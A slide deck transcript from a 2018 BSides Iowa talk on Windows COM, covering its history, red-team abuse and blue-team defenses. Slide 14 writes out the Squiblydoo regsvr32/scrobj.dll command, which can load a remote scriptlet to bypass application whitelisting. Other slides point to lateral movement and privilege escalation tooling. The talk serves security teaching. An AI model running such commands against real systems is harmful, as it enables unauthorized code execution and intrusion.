The document discusses Windows Component Object Model (COM) in detail, explaining its history, functionality, and exploitation potential. It covers various aspects of COM including its interoperability with .NET, exploitation techniques, and tools for researching weaknesses. The talk emphasizes the significance of COM in Windows systems and the need for both red and blue teams to understand its implications for security.

1. BSIDES IOWA 2018
ANDREW FREEBORN
WINDOWS COM:
RED VS BLUE

2. NEW PHONE; WHO DIS
▸IT Internal Audit Manager, Red Team at
ACI Worldwide
▸Previously: Red Team, Pen Tester, IT
▸@maendarb
▸https://vivirytech.blogspot.com
▸There will be pictures, minimal C++

3. AGENDA
▸COM background
▸Red: COM exploitation
▸Blue: COM defense

4. SURPRISE, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733

5. WHAT’S THIS WINDOWS COM THING?
▸ Stands for “Component Object Model”
▸ Designed in the 90s to be interoperable, portable
▸ It’s old; great books aren’t digital
▸ Not a “Shell” like CMD or PowerShell
▸ “Like” .NET and WMI
▸ Why am I so interested in this?

6. WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM
▸ Used everywhere in Windows
▸ When a user copies files, embeds Excel within Word
▸ It’s abstracted away with GUIs, .Net, APIs, and no one
acknowledges that COM objects are being used

7. COM BACKGROUND: COM LIVES EVERYWHERE
▸ Obligatory COM history
▸ Precursor to .NET
▸ Meant to solve problems with developers like DLLs
▸ There’s so many COM objects and won’t go away
▸ OLE and ActiveX fit in here
▸ OLE (Object Linking and Embedding) lets you
embed things (e.g. Excel sheet inside Word)
▸ ActiveX lets Internet Explorer make bad life choices

8. COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH
▸ Access COM things thru interfaces and objects
▸ Scripting.FileSystemObject
▸ IPersist
▸ IFileOperation
▸ WScript.Shell
http://compinfopro.com/enable-remote-desktop-enable-rdp/

9. COM BACKGROUND: COM MAKES YOU WORK FOR IT
▸ COM is a hot mess

10. COM BACKGROUND: ITS LIKE COM MAKES UP THE RULES AS IT GOES ALONG
▸ COM is a hot mess and can live in:
▸ Windows Registry
▸ Windows made a special registry hive
▸ HKCR (HKEY_Classes_Root)
▸ Combines HKLM and HKCU
▸ Threading / InProcServer32
▸ Manifest files (COM scriptlets; Registration free too!)

11. COM BACKGROUND: COM MAKES YOU WORK FOR IT
▸ WScript.Shell demo

12. COM BACKGROUND: COM+
ZeroSum tweeted about a COM+ scriptlet, but how
would you know it’s COM+ and not COM?

13. COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM)
▸ Scriptlets come in both COM and COM+ flavors
▸ They allow you to have COM scripts to do non-
malicious things like open calculator and cmd shells
▸ Did you know you can create COM objects from a
Java class? Good thing no one has a JRE installed.
https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx

14. HAX: REGSVR32 /S /N /U /I:BACKDOOR-MINIMALIST.SCT SCROBJ.DLL
▸ subTee example: COM manifest file
▸ Demo!
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

15. COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX
▸ regsvr32 is used to register many things in the registry
▸ /s runs it silently, /n says to not call DllRegisterServer
▸ /u specifies which COM server to uninstall
▸ /i calls DllInstall of the COM object to register
▸ Can be pointed to a file on your system
▸ Can be a URL (http: COM moniker)
▸ Could even be a Java class (java: COM moniker)
▸ scrobj.dll makes the magic go
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

16. COM BACKGROUND: COM+
▸ COM+ meant to solve the problems in COM like:
▸ Quickly implement common configurations for COM
components like security boundaries
▸ Load DLLs into processes on demand
▸ Managed methods to manage COM components
▸ Multi-pass… err.. threading
▸ Slick GUI
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx

17. COM BACKGROUND: COM+
▸ COM+ also came with rad icons in the GUI
▸ Demo!
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx

18. COM BACKGROUND: DCOM
▸ DCOM is “Distributed COM”
▸ “Helps you” in COM and COM+ with distributed
transactions
▸ Slings COM object data typically with RPC
▸ Likes to make assumptions you know what you’re
doing with security and marshaling data
▸ James Forshaw and Matt Nelson have been finding
problems with Windows and apps marshaling data
▸ DCOM lateral movement script (enigma0x3)
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/
blob/master/Invoke-DCOM.ps1

19. COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS)
▸ .NET can work with COM for interoperability
▸ “The Runtime Callable Wrapper (RCW) is a
mechanism that promotes transparent
communication between COM and the managed
programming model.”
https://msdn.microsoft.com/en-us/library/office/bb610378.aspx

20. COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS
▸ This is what PowerShell uses to call into COM objects
https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/
ComInterop/ComObject.cs

21. COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS)
▸ COM can work with .Net thru COM Callable Wrappers
▸ “When a COM client calls a .NET object, the common
language runtime creates the managed object and a
COM callable wrapper (CCW) for the object. Unable
to reference a .NET object directly, COM clients use
the CCW as a proxy for the managed object.”
https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx

22. COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC
▸ James Forshaw talked about .Net and COM
interoperability at DerbyCon 2017
▸ IronGeek Link: ig2.me/pZ

23. COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW
▸ To dig in more, you’re going to have to know C, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733

24. COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL
▸ QueryInterface is how you query… for interfaces
▸ This is how you figure out what interfaces are
available to you
▸ AddRef / Release may be important to you eventually
▸ Important if you want to partake in bug bounties :)
▸ This dictates the object lifetime by reference count
▸ Abusing the reference count introduces other
avenues of attack (cough Use After Free)
▸ If open redirects are still around, we should fix those first
https://blog.zsec.uk/cve-2017-3528/

25. COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE
▸ Raymond Chen talked about this in 2004
▸ Exploit DB has stuff on AddRef being misused
https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903
https://www.exploit-db.com/exploits/41042/

26. COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS
▸ Microsoft is still fixing COM related issues
▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far
▸ Researched by Haifei Li, Mark Dowd, James Forshaw
▸ Links posted on https://vivirytech.blogspot.com
▸ COM has a reoccurring theme at conferences
forgotten/“rediscovered”, but still broke (lulz)
▸ Kinda like Adobe issues, right?

27. COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED?
▸ How is COM exploited?
▸ UACMe
▸ James Forshaw
▸ Casey Smith
▸ Matt Nelson

28. COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE!
▸ Microsoft Process Explorer
▸ Find medium to high integrity attack paths
▸ ReactOS
▸ James Forshaw OleViewDotNet
(github.com/tyranid/oleviewdotnet)
▸ See the COM goodies in Windows
▸ Find new unexplored attack COM paths!

29. WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM
▸ Holy attack surface Batman! Thanks OleViewDotNet!
▸ 3,592 ways to see if you can discover a new attack path

30. WHAT HAPPENS WHEN I PRESS THIS BUTTON?
▸ Hey kid, wanna crash something? (this can peg your CPU)
▸ Watch with Process Monitor for potential attack paths
https://github.com/FuzzySecurity/DefCon25
fondue.exe may be a privilege escalation path

31. WE NEED THE BLUE TEAM, AND THEY NEED US
▸ There’s a lot of fun things that leverage COM
▸ ZeroSum’s Koadic: COM C&C
▸ MITRE’s ATT&CK framework
▸ @SubTee tweets (seriously)
▸ We need to use their research to our gain
▸ Run things like Squiblydoo to see EDR response
▸ Work with the product groups and blue team
▸ See how these products trigger IOCs and act

32. BLUE TEAM FUN!
▸ Are you running Windows 10 RS4 / Windows Server 2016?
▸ SpecterOps Device Guard configs / guide
▸ Are you doing PowerShell cmdline audit AND reviewing?
▸ Users probably don’t run PowerShell, if they do, use v5+
▸ Pick up on keywords like, “-COMObject”
▸ Do you really need wscript and cscript enabled?
▸ It can be done, ask @fpieces, he’s done it
▸ Deters attacks leveraging DotNetToJScript
▸ Investigate the potential of SysMon and Project VAST

33. ITS ALMOST TIME TO GO, LETS REVIEW QUICKLY
▸ COM is everywhere as it was ~20 years ago
▸ Lots of things not covered like “TreatAs” and monikers
▸ Many “exploits” are just abusing design decisions
▸ More research and community made tools will (most
likely) bring to light more COM exploits and wreckage
▸ Other organizations also add their own COM objects
▸ Sad face:

34. LEARN MORE AND CONTACT ME BELOW
▸ For more info about COM:
▸ https://vivirytech.blogspot.com
▸ @maendarb
▸ Slack: https://omasec.herokuapp.com